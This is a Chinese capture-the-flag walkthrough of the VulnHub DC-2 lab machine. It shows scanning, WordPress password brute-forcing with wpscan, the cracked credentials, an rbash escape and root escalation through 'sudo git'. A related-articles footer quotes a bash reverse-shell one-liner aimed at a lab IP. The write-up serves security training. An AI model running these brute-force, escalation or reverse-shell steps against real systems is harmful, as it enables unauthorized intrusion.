vulnhub靶场-DC2

2024-09-01 14:44
文章标签 靶场 vulnhub dc2

本文主要是介绍vulnhub靶场-DC2,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

一、环境配置

1.下载地址:https://www.vulnhub.com/entry/dc-2,311/

2.靶场配置:Nat模式 

 更改hosts文件,官网提示需要更改hosts文件才能访问到网站,否则访问不了

kali进入编辑模式vim,添加上自己的靶机ip地址保存即可

vim /etc/hosts

3.攻击机:kali

ip:192.168.111.128 

二、渗透测试

信息收集

1.主机探测
arp-scan -l

得知靶机ip地址:192.168.111.129 

2.端口探测 
nmap -sS -sV -p- -Pn -T5 192.168.111.129

可以看到开放了80端口http协议,还有7744端口ssh服务 

这里要注意:如果没有修改hosts文件,那么就不能重定向到dc-2中

3.目录扫描

发现了一个敏感目录,访问一下看看,为登录接口

dirb http://dc-2/

 4.flag探测

访问靶机ip即可重定向到dc-2

在此页面中呢,找到了flag1

提示我们:

你通常的单词列表可能不起作用,所以,也许你只需要 cewl。

密码越多越好,但有时您就是无法赢得所有密码。

以 1 人身份登录以查看下一个标志。

如果找不到,请以另一个人的身份登录。

kali密码攻击工具——Cewl使用指南-CSDN博客

cewl http://dc-2/ -w pass.txt   //保存在pass.txt文件中

发现改网站是由wordpress系统构成,那么我们直接去网站查找相关的漏洞

使用wpscan对网站用户进行枚举爆破(kail自带)

Kali WPScan的使用(WordPress扫描工具)_pscan是kali linux默认自带的一款漏洞扫描工具,它采用ruby编写,能够扫描wordpr-CSDN博客

WPScan是专门检查WordPress网站漏洞的工具,它可以全面检查wp网站的漏洞,例如插件,主题,备份文件等

扫描一下目标站点

wpscan --url http://dc-2/ --enumerate u

这里发现了三个用户admin、jerry、tom,保存到user.txt

接下来就要爆破账号密码了,直接爆破,这里试了好多次才成功爆破

wpscan --url http://dc-2/ -U user.txt -P pass.txt

使用账号密码进行登录

jerry / adipiscing

tom / parturient

成功进入后台

 

翻到page这一页面,找到了flag2

flag2提示:

如果您无法利用 WordPress 并走捷径,还有另一种方法。

希望您找到了另一个切入点。

一直翻一直翻,找到了文件上传点

看能不能直接上传php文件,先随便上传个php木马文件,显示该文件类型上传失败

再尝试上传图片文件

又显示以下问题:

无法创建目录 wp-content/uploads/2024/08。它的父目录可以被服务器写入吗?

那么就无法上传文件了,只能换个方向了

SSH远程登录

这里刚开始的时候有试过ssh,但是还不知道能修改端口进行登录。开始的端口扫描,发现此将ssh端口改为7744,那么我们尝试将上面得到的用户名和密码再次进行SSH远程登录尝试

这里只能登录tom的账号,jerry账号登录失败了

ssh tom@192.168.111.129 -p 7744

登录成功后,发现在当前目录下发现了flag3.txt,但是该账户没有cat命令

网上搜索一下还有哪些查看文件的命令,发现这里只能使用less了

less flag3.txt

flag3给出以下提示:

可怜的老汤姆总是追着杰瑞跑。也许他应该为他造成的所有压力感到自豪。(su命令提示)

可看到出现su命令提示,我们尝试切换到Jerry用户,发现没有su ,我们需要rbash逃逸

【渗透测试】--- rbash逃逸方法简述-CSDN博客

这里只能用vi进入,但是呢发现根本不能编辑,所以这方法还是放掉了

export   #显示系统环境变量

在上面的博客中,又发现了方法,此方法成功实现了

添加完环境变量之后,看看能不能切换成jerry用户

发现已成功切换成jerry用户

然后切换目录到/home/jerry目录下,发现了flag4.txt

紧接着flag4给出提示:

很高兴看到您已经走到了这一步 - 但您还没有回家。

你仍然需要获取最后一个标志(唯一真正重要的标志!!)。 

这里没有提示 - 你现在只能靠自己了。 :-)

继续 - git outta here !!

这里我们先提权,给出git命令,我们尝试一下用git提权

2022-渗透测试-git提权(Linux)_sudo git -p help-CSDN博客

sudo git -p help!/bin/bash   #在最后输入该命令进行提权

发现该命令已提权成功

回到根目录,查看文件,发现最终flag

最终flag信息:

祝贺大家!!

特别感谢所有给我发推文的人
并为我提供了反馈 - 这一切都很棒
赞赏。

如果您喜欢这个 CTF,请通过 @DCAU7 给我发推文。

三、总结 

此靶场比较简单,主要是要注意前期的信息收集,包括端口、目录,此靶场是根据收集到的目录来慢慢突破,然后根据系统服务wordpress使用相应的爆破工具爆破账号和密码,接着就是用ssh的特定端口进行登录,登录完之后发现许多命令却不能使用,网上查找查看文件相关命令,重要的就是rbash逃逸,这里是用bash_cmds自定义shell指令,接着就能够切换用户了,后面就是简单的git提权

这篇关于vulnhub靶场-DC2的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/1127229

相关文章

BUUCTF靶场[web][极客大挑战 2019]Http、[HCTF 2018]admin

目录   [web][极客大挑战 2019]Http 考点:Referer协议、UA协议、X-Forwarded-For协议 [web][HCTF 2018]admin 考点:弱密码字典爆破 四种方法:   [web][极客大挑战 2019]Http 考点:Referer协议、UA协议、X-Forwarded-For协议 访问环境 老规矩,我们先查看源代码

log4j靶场,反弹shell

1.用vulhub靶场搭建,首先进入目录CVE-2021-44228中,docker启动命令 2.发现端口是8983,浏览器访问http://172.16.1.18:8983/ 3.用dnslog平台检测dns回显,看看有没有漏洞存在 4.反弹shell到kali(ip为172.16.1.18)的8888端口 bash -i >& /dev/tcp/172.16.1.18

红日靶场----(四)1.后渗透利用阶段

使用Metasploit进入后渗透利用阶段     一旦我们获取了目标主机的访问权限,我们就可以进入后渗透利用阶段,在这个阶段我们收集信息,采取措施维护我们的访问权限,转向其他机器     Step01:上线MSF(通过metasploit获取目标系统的会话-即SHELL) 常用选项-p //指定生成的Payload--list payload //列出所支持的Payload类

【红日靶场】ATTCK实战系列——红队实战(一)手把手教程

目录 入侵网络的思路 一些概念 (1)工作组 (2)域 (3)账号 红日靶机(一) 网络结构 下载 配置web服务器的两张网卡 配置内网的两台机器(域控和域内主机) 渗透web服务器 外网信息搜集 (1)外网信息搜集的内容 (2)开始信息搜集(主要是利用工具) 漏洞利用 (1)漏洞利用的两种方式 (2)利用phpMyAdmin (3)开启3389端口远程桌面

tomato靶场攻略

1.使用nmap扫描同网段的端口,发现靶机地址 2.访问到主页面,只能看到一个大西红柿 3.再来使用dirb扫面以下有那些目录,发现有一个antibot_image 4.访问我们扫到的地址 ,点金目录里看看有些什么文件 5.看到info.php很熟悉,点进去看看   6.查看源代码发现是通过GET方式传参的 ,有文件包含漏洞 7. 利用文件包含漏洞,我们尝试查看一

Tomato靶场渗透测试

1.扫描靶机地址 可以使用nmap进行扫描 由于我这已经知道靶机地址 这里就不扫描了 2.打开网站 3.进行目录扫描 dirb    http://172.16.1.113 发现有一个antibot_image目录 4.访问这个目录 可以看到有一个info.php 5.查看页面源代码 可以发现可以进行get传参 6.尝试查看日志文件 http://172.16

攻防世界 —— 靶场笔记合集

靶场地址:https://adworld.xctf.org.cn/ 备注:此为靶场笔记合集的目录,是我接下来待更新的内容(主要是因为主线一篇太耗时间了,所以开通一条支线,来满足我日更两篇的目标,当该靶场更新完毕后,此条注释会删除) 0x01:Misc 0x02:Pwn 0x03:Web 0x0301:Web - Level 1 0x04:Reverse 0x05:Crypto

【靶场】upload-labs-master(前11关)

🏘️个人主页: 点燃银河尽头的篝火(●’◡’●) 如果文章有帮到你的话记得点赞👍+收藏💗支持一下哦 【靶场】upload-labs-master(前11关) 第一关 Pass-01第二关 Pass-02第三关 Pass-03第四关 Pass-04第五关 Pass-05第六关 Pass-06第七关 Pass-07第八关 Pass-08第九关 Pass-09第十关 Pass-10第

pikachu文件包含漏洞靶场通关攻略

本地文件包含 先上传一个jpg文件,内容写上<?php phpinfo();?> 上传成功并且知晓了文件的路径 返回本地上传,并../返回上级目录 可以看到我们的php语句已经生效 远程文件包含 在云服务器上创建一个php文件 然后打开pikachu的远程文件包含靶场,随便选一个提交 在filename处修改为云服务器的目标地址 127.0.0.1/pik

【靶场】CTFshow—vip限免题目11~20

🏘️个人主页: 点燃银河尽头的篝火(●’◡’●) 如果文章有帮到你的话记得点赞👍+收藏💗支持一下哦 【靶场】CTFshow—vip限免题目11~20 域名txt记录泄露敏感信息公布内部技术文档泄露编辑器配置不当密码逻辑脆弱探针泄露CDN穿透js敏感信息泄露前端密钥泄露数据库恶意下载 域名txt记录泄露 提示:域名其实也可以隐藏信息,比如ctfshow.com 就